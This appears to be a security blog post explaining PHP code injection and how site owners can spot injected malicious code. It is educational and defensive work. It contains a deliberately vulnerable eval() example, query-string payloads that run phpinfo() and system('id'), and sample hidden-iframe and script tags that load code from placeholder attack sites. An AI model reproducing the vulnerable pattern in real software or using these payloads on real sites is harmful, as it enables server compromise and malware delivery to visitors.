Home / Hacking / Attack Preventions / How to detect code injection attack
code injection attack

How to detect code injection attack

Code injection is also known as PHP code injection. Code injection attack is an exploitation technique where a computer bug is exploited by injecting code into an application which is then executed by application itself.

PHP code injection attacks are generally performed by injecting a PHP code into the PHP based vulnerable application. The attacks are generally possible because of the improper handling of the input data or improper input validation.

A general misconception is about code injection and command injection being same. These are two different things. An attacker exploiting PHP code injections vulnerability could only perform what a PHP can perform, but with command injection he could leverage it to the system commands.

Injection is used by an attacker to introduce (or “inject“) code into a vulnerable computer program and change the course of execution.

These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:

  • allowed characters
  • data format
  • amount of expected data

Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.

Risk Factors

  • These types of vulnerabilities can range from very hard to find, to easy to find
  • If found, are usually moderately hard to exploit, depending of scenario
  • If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability


When a developer uses the PHP eval() function and passes it un-trusted data that an attacker can modify, code injection could be possible.

The example below shows a dangerous way to use the eval() function:

$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");

As there is no input validation, the code above is vulnerable to a Code Injection attack.

For example:

/index.php?arg=1; phpinfo()

While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example:

/index.php?arg=1; system('id')

What does it mean to have pages marked with malware infection type “Code injection” in Google Search Console?

This means that pages on your site were modified to include malicious code, such as an iframe to a malware attack site.

Avoid using a browser to view infected pages on your site. Because malware often spreads by exploiting browser vulnerabilities, opening an infected malware page in a browser may damage your computer.

Log in to your filesystem. Investigate all resources that write to the “code injection” infected URLs. Some examples of malicious code injections the following:

    • iframe to an attack site
<iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
  style="display:none" width="0"></iframe>
    • JavaScript or another scripting language that calls and runs scripts from an attack site
<script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
    • Scripting that redirects the browser to an attack site
  if (document.referrer.match(/google\.com/)) {

Investigate all possible harmful code present on the site. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are “script”, “eval”, and “unescape”.

See also how to hack website with SQL Injection.

About Kamran Mohsin

Kamran Mohsin
Kamran Mohsin is a Certified Ethical Hacker. Currently working as a Penetration Tester within a private company in Pakistan. He is also doing Masters in information Security. He worked in web development (front-back-end) from recent back years. With the passage of time he took interest in Hacking and started to write blogs on IS from late 2015.

Check Also

SSH Key-Based Authentication

How To Configure SSH Key-Based Authentication on a Linux Server

Introduction to SSH Secure Shell (SSH) is a cryptographic network protocol for operating network services …

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: